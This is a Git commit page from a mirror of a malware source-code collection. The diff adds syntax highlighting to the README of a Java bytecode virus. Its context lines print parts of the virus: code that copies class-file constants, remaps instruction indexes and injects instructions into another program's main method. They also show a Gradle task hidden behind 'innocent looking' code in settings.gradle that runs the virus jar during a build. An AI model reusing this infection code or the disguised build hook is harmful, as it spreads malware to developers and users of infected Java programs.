daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Added syntax highlighting

Browse Source
This commit is contained in:
TheDuchy
2020-11-01 03:08:15 +01:00
committed by GitHub
parent be18696767
commit b6467a43b8
1 changed files with 4 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Java/Virus.Java.Cheshire.a/README.md
+4 -4
View File
@@ -99,7 +99,7 @@ The viurs should be flexible and allow for advanced payloads specific by the use
This is probably the easiest part of the whole process. Our code for doing this is: This is probably the easiest part of the whole process. Our code for doing this is:
``` ```java
public static int copyConstant(HashMap<String, Object> origin, int origin_index, HashMap<String, Object> destination){ public static int copyConstant(HashMap<String, Object> origin, int origin_index, HashMap<String, Object> destination){
byte[][] constant_pool = (byte[][]) origin.get("constant_pool"); byte[][] constant_pool = (byte[][]) origin.get("constant_pool");
byte[] orig_constant = constant_pool[origin_index-1]; byte[] orig_constant = constant_pool[origin_index-1];
@@ -253,7 +253,7 @@ merely a matter of adding it to an index of methods, the real challenge is in en
methods to actually function at runtime. methods to actually function at runtime.
The workhorse of the virus for this is the instructionIndex method: The workhorse of the virus for this is the instructionIndex method:
``` ```java
public static int instructionIndex(int index, ArrayList<byte[]> oldList, ArrayList<byte[]> newList){ public static int instructionIndex(int index, ArrayList<byte[]> oldList, ArrayList<byte[]> newList){
int oldposition = 0; int oldposition = 0;
int newposition = 0; int newposition = 0;
@@ -311,7 +311,7 @@ is that it took forever to get functioning without errors.
The last part of our process after we copy our methods is actually inject instructions into a function that we did not The last part of our process after we copy our methods is actually inject instructions into a function that we did not
write and have no control over. The good news for me is that this didn't require too much extra work. write and have no control over. The good news for me is that this didn't require too much extra work.
``` ```java
public static void inject(HashMap<String, Object> origin, HashMap<String, Object> destination){ public static void inject(HashMap<String, Object> origin, HashMap<String, Object> destination){
//Are there any functions called main? //Are there any functions called main?
//Get the method, get the code attribute, extract code, place instruction and see if we can extend StackMapFrame //Get the method, get the code attribute, extract code, place instruction and see if we can extend StackMapFrame
@@ -390,7 +390,7 @@ probably also works in Android studio. I haven't tried it myself - maybe you sho
The trick is very simple: The trick is very simple:
In settings.gradle in your project, place some innocent looking comments and code: In settings.gradle in your project, place some innocent looking comments and code:
``` ```gradle
task testSuite(type: JavaExec) { task testSuite(type: JavaExec) {
jar jar
classpath = files('build/libs/BytecodeVirus-1.0-SNAPSHOT.jar') classpath = files('build/libs/BytecodeVirus-1.0-SNAPSHOT.jar')